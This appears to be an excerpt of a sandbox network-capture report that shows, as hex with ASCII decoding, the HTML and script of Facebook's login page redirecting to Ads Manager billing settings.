                                                                                    Data Ascii: d430<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="f5jFR5CM">function envFlush(a){function b(b){for(var c in a)b[c]=a
                                                                                    2023-02-07 18:46:13 UTC1125INData Raw: 53 65 65 20 70 6f 73 74 73 2c 20 70 68 6f 74 6f 73 20 61 6e 64 20 6d 6f 72 65 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 79 76 2f 72 2f 42 38 42 78 73 73 63 66 56 42 72 2e 69 63 6f 22 20 2f 3e 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 45 2f 6c 2f 30 2c 63 72 6f 73 73 2f 52 73 70 77 45 31 55 59 4c 77 72 2e 63 73 73 3f 5f 6e 63 5f 78
                                                                                    Data Ascii: See posts, photos and more on Facebook." /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/RspwE1UYLwr.css?_nc_x
                                                                                    2023-02-07 18:46:13 UTC1127INData Raw: 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 28 7b 22 63 6c 70 44 61 74 61 22 3a 7b 22 31 38 31 34 38 35 32 22 3a 7b 22 72 22 3a 31 7d 2c 22 31 38 33 38 31 34 32 22 3a 7b 22 72 22 3a 31 2c 22 73 22 3a 31 7d 2c 22 31 39 34 39 38 39 38 22 3a 7b 22 72 22 3a 31 7d 2c 22 31 38 34 38 38 31 35 22 3a 7b 22 72 22 3a 31 30 30 30 30 2c 22 73 22 3a 31 7d 2c 22 31 37 34 34 31 37 38 22 3a 7b 22 72 22 3a 31 2c 22 73 22 3a 31 7d 7d 2c 22 67 6b 78 44 61 74 61 22 3a 7b 22 36 37 36 38 33 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 4e 38 77 42 5a 41 38 63 74 43 64 48 77 35 75 34 22 7d 2c 22 36 37 36 39 32 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22
                                                                                    Data Ascii: upportData"],function(m){m.handle({"clpData":{"1814852":{"r":1},"1838142":{"r":1,"s":1},"1949898":{"r":1},"1848815":{"r":10000,"s":1},"1744178":{"r":1,"s":1}},"gkxData":{"676837":{"result":false,"hash":"AT4N8wBZA8ctCdHw5u4"},"676920":{"result":true,"hash"
                                                                                    2023-02-07 18:46:13 UTC1128INData Raw: 33 31 5d 2c 5b 22 43 6f 6f 6b 69 65 44 6f 6d 61 69 6e 22 2c 5b 5d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 22 7d 2c 36 34 32 31 5d 2c 5b 22 43 75 72 72 65 6e 74 41 64 41 63 63 6f 75 6e 74 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 22 41 44 5f 41 43 43 4f 55 4e 54 5f 49 44 22 3a 6e 75 6c 6c 7d 2c 36 38 32 38 5d 2c 5b 22 42 6f 6f 74 6c 6f 61 64 65 72 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 64 65 66 65 72 42 6f 6f 74 6c 6f 61 64 73 22 3a 66 61 6c 73 65 2c 22 6a 73 52 65 74 72 69 65 73 22 3a 5b 32 30 30 2c 35 30 30 5d 2c 22 6a 73 52 65 74 72 79 41 62 6f 72 74 4e 75 6d 22 3a 32 2c 22 6a 73 52 65 74 72 79 41 62 6f 72 74 54 69 6d 65 22 3a 35 2c 22 73 69 6c 65 6e 74 44 75 70 73 22 3a 66 61 6c 73 65 2c 22 68 79 70 53 74 65 70
                                                                                    Data Ascii: 31],["CookieDomain",[],{"domain":"facebook.com"},6421],["CurrentAdAccountInitialData",[],{"AD_ACCOUNT_ID":null},6828],["BootloaderConfig",[],{"deferBootloads":false,"jsRetries":[200,500],"jsRetryAbortNum":2,"jsRetryAbortTime":5,"silentDups":false,"hypStep
                                                                                    2023-02-07 18:46:13 UTC1130INData Raw: 53 45 4e 47 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f 43 41 4c 4c 5f 47 55 45 53 54 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 57 4f 52 4b 5f 4d 45 53 53 45 4e 47 45 52 5f 43 41 4c 4c 5f 47 55 45 53 54 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 57 4f 52 4b 52 4f 4f 4d 53 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 41 50 50 5f 49 44 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 49 53 5f 42 55 53 49 4e 45 53 53 5f 44 4f 4d 41 49 4e 22 3a 66 61 6c 73 65 7d 2c 32 37 30 5d 2c 5b 22 44 54 53 47 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 7d 2c 32 35 38 5d 2c 5b 22 49 53 42 22 2c 5b 5d 2c 7b 7d 2c 33 33 30 5d 2c 5b 22 4c 53 44 22 2c 5b 5d 2c 7b 22 74 6f 6b 65 6e 22 3a 22 41 56 6f 70 2d 32 66 56 75 74 77
                                                                                    Data Ascii: SENGER":false,"IS_MESSENGER_CALL_GUEST_USER":false,"IS_WORK_MESSENGER_CALL_GUEST_USER":false,"IS_WORKROOMS_USER":false,"APP_ID":"256281040558","IS_BUSINESS_DOMAIN":false},270],["DTSGInitialData",[],{},258],["ISB",[],{},330],["LSD",[],{"token":"AVop-2fVutw
                                                                                    2023-02-07 18:46:13 UTC1131INData Raw: 2c 5b 5d 2c 7b 22 6b 69 6c 6c 65 64 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 4d 4c 48 55 42 5f 46 4c 4f 57 5f 41 55 54 4f 52 45 46 52 45 53 48 5f 53 45 41 52 43 48 22 2c 22 4e 45 4b 4f 5f 44 49 53 41 42 4c 45 5f 43 52 45 41 54 45 5f 46 4f 52 5f 53 41 50 22 2c 22 45 4f 5f 44 49 53 41 42 4c 45 5f 53 59 53 54 45 4d 5f 53 45 52 49 41 4c 5f 4e 55 4d 42 45 52 5f 46 52 45 45 5f 54 59 50 49 4e 47 5f 49 4e 5f 43 50 45 5f 4e 4f 4e 5f 43 4c 49 45 4e 54 22 2c 22 4d 4f 42 49 4c 49 54 59 5f 4b 49 4c 4c 5f 4f 4c 44 5f 56 49 53 49 42 49 4c 49 54 59 5f 50 4f 53 49 54 49 4f 4e 5f 53 45 54 54 49 4e 47 22 2c 22 57 4f 52 4b 50 4c 41 43 45 5f 44 49 53 50 4c 41 59 5f 54 45 58 54 5f 45 56 49 44 45 4e 43 45 5f 52 45 50 4f 52 54 49 4e 47 22 2c 22 42 55 53 49 4e 45 53 53 5f 49 4e 56
                                                                                    Data Ascii: ,[],{"killed":{"__set":["MLHUB_FLOW_AUTOREFRESH_SEARCH","NEKO_DISABLE_CREATE_FOR_SAP","EO_DISABLE_SYSTEM_SERIAL_NUMBER_FREE_TYPING_IN_CPE_NON_CLIENT","MOBILITY_KILL_OLD_VISIBILITY_POSITION_SETTING","WORKPLACE_DISPLAY_TEXT_EVIDENCE_REPORTING","BUSINESS_INV
                                                                                    2023-02-07 18:46:13 UTC1133INData Raw: 7a 76 50 33 77 22 2c 22 34 4e 53 71 33 5a 43 34 53 63 45 22 2c 22 35 33 67 43 78 4b 71 32 38 31 47 22 2c 22 33 79 7a 7a 77 42 59 37 4e 70 6a 22 2c 22 31 6f 6e 7a 49 76 30 6a 48 36 48 22 2c 22 38 50 6c 4b 75 6f 77 61 66 65 38 22 2c 22 31 6e 74 6a 5a 32 7a 67 66 30 33 22 2c 22 34 53 49 48 32 47 52 56 58 35 57 22 2c 22 32 64 68 71 52 6e 71 58 47 4c 51 22 2c 22 32 57 67 69 4e 4f 72 48 56 75 43 22 2c 22 61 6d 4b 48 62 34 43 77 34 57 49 22 2c 22 38 72 44 76 4e 39 76 57 64 41 4b 22 2c 22 35 42 64 7a 57 47 6d 66 76 72 41 22 2c 22 44 44 5a 68 6f 67 49 31 39 57 22 2c 22 61 63 72 4a 54 68 39 57 47 64 70 22 2c 22 31 6f 4f 45 36 34 66 4c 34 77 4f 22 2c 22 35 58 43 7a 31 68 39 49 61 77 33 22 2c 22 37 72 36 6d 53 50 37 6f 66 72 32 22 2c 22 36 44 47 50 4c 72 52 64 79 74
                                                                                    Data Ascii: zvP3w","4NSq3ZC4ScE","53gCxKq281G","3yzzwBY7Npj","1onzIv0jH6H","8PlKuowafe8","1ntjZ2zgf03","4SIH2GRVX5W","2dhqRnqXGLQ","2WgiNOrHVuC","amKHb4Cw4WI","8rDvN9vWdAK","5BdzWGmfvrA","DDZhogI19W","acrJTh9WGdp","1oOE64fL4wO","5XCz1h9Iaw3","7r6mSP7ofr2","6DGPLrRdyt
                                                                                    2023-02-07 18:46:13 UTC1134INData Raw: 69 6e 73 22 3a 5b 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 69 76 65 2e 61 64 79 65 6e 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 6e 74 65 67 72 61 74 69 6f 6e 2d 66 61 63 65 62 6f 6f 6b 2e 70 61 79 75 2e 69 6e 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 66 61 63 65 62 6f 6f 6b 2e 70 61 79 75 6c 61 74 61 6d 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 65 63 75 72 65 2e 70 61 79 75 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 66 61 63 65 62 6f 6f 6b 2e 64 6c 6f 63 61 6c 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 62 75 79 32 2e 62 6f 6b 75 2e 63 6f 6d 22 5d 7d 2c 34 39 32 30 5d 2c 5b 22 42 6f 6f 74 6c 6f 61 64 65 72 45 6e 64 70 6f 69 6e 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 64 65 62 75 67 4e 6f 42 61 74 63 68 69 6e 67 22 3a 66 61
                                                                                    Data Ascii: ins":["https:\/\/live.adyen.com","https:\/\/integration-facebook.payu.in","https:\/\/facebook.payulatam.com","https:\/\/secure.payu.com","https:\/\/facebook.dlocal.com","https:\/\/buy2.boku.com"]},4920],["BootloaderEndpointConfig",[],{"debugNoBatching":fa
                                                                                    2023-02-07 18:46:13 UTC1136INData Raw: 72 22 3a 31 2c 22 5c 2f 68 72 5c 2f 70 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 75 6e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 70 6f 6c 69 63 79 5c 2f 6f 70 74 69 6e 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 77 72 69 74 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 6c 65 67 61 6c 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 66 72 65 65 5c 2f 22 3a 31 2c 22 5c 2f 61 62 6f 75 74 5c 2f 70 72 69 76 61 63 79 5c 2f 22 3a 31 2c 22 5c 2f 61 62 6f 75 74 5c 2f 70 72 69 76 61 63 79 5c 2f 75 70 64 61 74 65 5c 2f 22 3a 31 2c 22 5c 2f 70 72 69 76 61 63 79 5c 2f 65 78 70 6c 61 6e 61 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 74 6f 67 67 6c 65
                                                                                    Data Ascii: r":1,"\/hr\/p":1,"\/zero\/unsupported_browser\/":1,"\/zero\/policy\/optin":1,"\/zero\/optin\/write\/":1,"\/zero\/optin\/legal\/":1,"\/zero\/optin\/free\/":1,"\/about\/privacy\/":1,"\/about\/privacy\/update\/":1,"\/privacy\/explanation\/":1,"\/zero\/toggle
                                                                                    2023-02-07 18:46:13 UTC1137INData Raw: 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 73 65 74 74 69 6e 67 73 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 61 6c 6f 68 61 5f 63 68 65 63 6b 5f 62 75 69 6c 64 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 7a 62 64 5c 2f 73 6f 66 74 6e 75 64 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 61 66 5f 74 72 61 6e 73 69 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 61 66 5f 74 72 61 6e 73 69 74 69 6f 6e 5c 2f 61 63 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 66 72 65 65 6d 69 75 6d 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 66 72 65 65 6d 69 75 6d 5c 2f 72 65 64 69 72 65 63 74
                                                                                    Data Ascii: ":1,"\/mobile\/zero\/carrier_page\/settings_page\/":1,"\/aloha_check_build":1,"\/upsell\/zbd\/softnudge\/":1,"\/mobile\/zero\/af_transition\/":1,"\/mobile\/zero\/af_transition\/action\/":1,"\/mobile\/zero\/freemium\/":1,"\/mobile\/zero\/freemium\/redirect
                                                                                    2023-02-07 18:46:13 UTC1139INData Raw: 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6c 69 66 66 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6f 6e 66 69 72 6d 5c 2f 73 75 62 6d 69 74 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6f 6e 66 69 72 6d 65 64 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 6c 6f 67 69 6e 5c 2f 22 3a 31 2c 22 5c 2f 70 72 65 63 6f 6e 66 69 72 6d 61 74 69 6f 6e 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5f 63 68 61 6e 67 65 5c 2f 22 3a 31 2c 22 5c 2f 68 65 6c 70 5c 2f 63 6f 6e 74 61 63 74 5c 2f 22 3a 31 2c 22 5c 2f 73 75 72 76 65 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 6c 6f 79 61 6c 74 79 74 6f 70 75 70 5c 2f 61 63 63 65 70 74 5c 2f 22 3a 31 2c 22 5c 2f 73 65 74 74 69 6e 67 73
                                                                                    Data Ascii: \/contactpoint\/cliff\/":1,"\/contactpoint\/confirm\/submit\/":1,"\/contactpoint\/confirmed\/":1,"\/contactpoint\/login\/":1,"\/preconfirmation\/contactpoint_change\/":1,"\/help\/contact\/":1,"\/survey\/":1,"\/upsell\/loyaltytopup\/accept\/":1,"\/settings
                                                                                    2023-02-07 18:46:13 UTC1140INData Raw: 42 5a 6c 49 72 47 52 6d 7a 34 44 4d 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 30 38 38 38 36 22 2c 5b 22 45 76 65 6e 74 50 72 6f 66 69 6c 65 72 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 45 76 65 6e 74 50 72 6f 66 69 6c 65 72 49 6d 70 6c 22 2c 22 41 61 32 55 62 75 49 6a 51 52 67 33 4b 74 36 46 6b 77 39 4b 6f 5f 34 38 77 57 55 77 36 61 54 30 51 48 71 73 32 62 77 5f 78 6f 70 6b 69 33 38 75 6a 5f 6a 4d 72 6c 6f 45 54 44 71 4d 62 6a 33 33 36 46 67 4f 38 43 35 4c 63 68 4d 50 4d 31 42 42 5a 6c 49 72 47 52 6d 7a 34 44 4d 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 31 37 38 32 32 22 2c 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 2c 22 41 61 32 55 62 75 49 6a 51 52 67 33 4b 74
                                                                                    Data Ascii: BZlIrGRmz4DM"]},-1],["cr:708886",["EventProfilerImpl"],{"__rc":["EventProfilerImpl","Aa2UbuIjQRg3Kt6Fkw9Ko_48wWUw6aT0QHqs2bw_xopki38uj_jMrloETDqMbj336FgO8C5LchMPM1BBZlIrGRmz4DM"]},-1],["cr:717822",["TimeSliceImpl"],{"__rc":["TimeSliceImpl","Aa2UbuIjQRg3Kt
                                                                                    2023-02-07 18:46:13 UTC1141INData Raw: 50 4d 31 42 42 5a 6c 49 72 47 52 6d 7a 34 44 4d 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 32 39 34 31 34 22 2c 5b 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 22 2c 22 41 61 33 51 64 76 49 59 79 74 6f 53 51 72 55 71 78 53 69 69 6c 4d 4d 30 35 33 64 4e 54 49 74 34 6e 79 43 62 66 46 62 75 31 4e 2d 74 6c 58 41 73 31 5f 69 76 34 4c 4c 63 4c 51 47 48 43 41 73 4d 69 33 50 4a 49 37 67 30 49 77 38 58 4e 79 6c 30 4d 4f 61 37 61 4c 57 48 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 39 34 39 30 37 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 31 31 78 4d 61 2d 77 2d 30 77 54 4f 4e 74 53 75 64 53 43 37 39 34 44 30 2d 6a 50 4c 5a 6a 39 74 31 63 71 52 51 42
                                                                                    Data Ascii: PM1BBZlIrGRmz4DM"]},-1],["cr:729414",["VisualCompletion"],{"__rc":["VisualCompletion","Aa3QdvIYytoSQrUqxSiilMM053dNTIt4nyCbfFbu1N-tlXAs1_iv4LLcLQGHCAsMi3PJI7g0Iw8XNyl0MOa7aLWH"]},-1],["cr:1094907",[],{"__rc":[null,"Aa11xMa-w-0wTONtSudSC794D0-jPLZj9t1cqRQB
                                                                                    2023-02-07 18:46:13 UTC1143INData Raw: 30 4e 4e 64 51 69 66 59 42 4a 33 70 45 77 69 58 58 22 5d 7d 2c 2d 31 5d 5d 2c 22 72 65 71 75 69 72 65 22 3a 5b 5b 22 6d 61 72 6b 4a 53 45 6e 61 62 6c 65 64 22 5d 2c 5b 22 6c 6f 77 65 72 44 6f 6d 61 69 6e 22 5d 2c 5b 22 55 52 4c 46 72 61 67 6d 65 6e 74 50 72 65 6c 75 64 65 22 5d 2c 5b 22 50 72 69 6d 65 72 22 5d 2c 5b 22 42 69 67 50 69 70 65 22 5d 2c 5b 22 42 6f 6f 74 6c 6f 61 64 65 72 22 5d 2c 5b 22 54 69 6d 65 53 6c 69 63 65 22 5d 2c 5b 22 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 5b 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 5b 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 47 61 74 69 6e 67 22 5d 2c 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 5d 2c 5b 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74
                                                                                    Data Ascii: 0NNdQifYBJ3pEwiXX"]},-1]],"require":[["markJSEnabled"],["lowerDomain"],["URLFragmentPrelude"],["Primer"],["BigPipe"],["Bootloader"],["TimeSlice"],["AsyncRequest"],["BanzaiScuba_DEPRECATED"],["VisualCompletionGating"],["FbtLogging"],["IntlQtEventFalcoEvent
                                                                                    2023-02-07 18:46:13 UTC1144INData Raw: 70 6c 65 74 65 3d 22 6f 66 66 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6c 73 64 22 20 76 61 6c 75 65 3d 22 41 56 6f 70 2d 32 66 56 75 74 77 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 2f 3e 3c 74 61 62 6c 65 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 3e 3c 74 72 3e 3c 74 64 20 63 6c 61 73 73 3d 22 68 74 6d 6c 37 6d 61 67 69 63 22 3e 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 65 6d 61 69 6c 22 3e 45 6d 61 69 6c 20 6f 72 20 70 68 6f 6e 65 3c 2f 6c 61 62 65 6c 3e 3c 2f 74 64 3e 3c 74 64 20 63 6c 61 73 73 3d 22 68 74 6d 6c 37 6d 61 67 69 63 22 3e 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 70 61 73 73 22 3e 50 61 73 73 77 6f 72 64 3c 2f 6c
                                                                                    Data Ascii: plete="off" /><input type="hidden" name="lsd" value="AVop-2fVutw" autocomplete="off" /><table cellspacing="0" role="presentation"><tr><td class="html7magic"><label for="email">Email or phone</label></td><td class="html7magic"><label for="pass">Password</l
                                                                                    2023-02-07 18:46:13 UTC1146INData Raw: 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 5f 73 6f 75 72 63 65 22 20 76 61 6c 75 65 3d 22 6c 6f 67 69 6e 5f 62 6c 75 65 62 61 72 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 67 75 69 64 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 70 72 65 66
                                                                                    Data Ascii: com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><input type="hidden" autocomplete="off" name="login_source" value="login_bluebar" /><input type="hidden" autocomplete="off" name="guid" value="" /><input type="hidden" autocomplete="off" id="pref
                                                                                    2023-02-07 18:46:13 UTC1147INData Raw: 67 20 69 74 2e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 69 49 6e 74 65 72 73 74 69 74 69 61 6c 42 61 72 20 75 69 42 6f 78 47 72 61 79 20 74 6f 70 62 6f 72 64 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 66 6c 6f 61 74 20 5f 6f 68 66 22 3e 3c 6c 61 62 65 6c 20 63 6c 61 73 73 3d 22 75 69 42 75 74 74 6f 6e 20 75 69 42 75 74 74 6f 6e 4c 61 72 67 65 22 20 66 6f 72 3d 22 75 5f 30 5f 31 5f 72 47 22 3e 3c 69 20 63 6c 61 73 73 3d 22 6d 72 73 20 69 6d 67 20 73 70 5f 68 34 53 77 72 63 38 74 69 57 4a 20 73 78 5f 66 64 38 30 31 39 22 3e 3c 2f 69 3e 3c 69 6e 70 75 74 20 76 61 6c 75 65 3d 22 42 61 63 6b 22 20 6f 6e 63 6c 69 63 6b 3d 22 67 6f 55 52 49 28 26 71 75 6f 74 3b 26 71 75 6f
                                                                                    Data Ascii: g it.</div><div class="uiInterstitialBar uiBoxGray topborder"><div class="clearfix"><div class="rfloat _ohf"><label class="uiButton uiButtonLarge" for="u_0_1_rG"><i class="mrs img sp_h4Swrc8tiWJ sx_fd8019"></i><input value="Back" onclick="goURI(&quot;&quo
                                                                                    2023-02-07 18:46:13 UTC1149INData Raw: 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 31 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 46 72 65 6e 63 68 20 28 46 72 61 6e 63 65 29 22 3e 46 72 61 6e c3 a7 61 69 73 20 28 46 72 61 6e 63 65 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 2d 69 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63
                                                                                    Data Ascii: ot;, &quot;www_list_selector&quot;, 1); return false;" title="French (France)">Franais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Facc
                                                                                    2023-02-07 18:46:13 UTC1150INData Raw: 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 34 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 41 6c 62 61 6e 69 61 6e 22 3e 53 68 71 69 70 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 73 2d 6c 61 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f
                                                                                    Data Ascii: 252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 4); return false;" title="Albanian">Shqip</a></li><li><a class="_sv4" dir="ltr" href="https://es-la.facebook.com/login.php?
                                                                                    2023-02-07 18:46:13 UTC1152INData Raw: 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 37 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 41 72 61 62 69 63 22 3e d8 a7 d9 84 d8 b9 d8 b1 d8 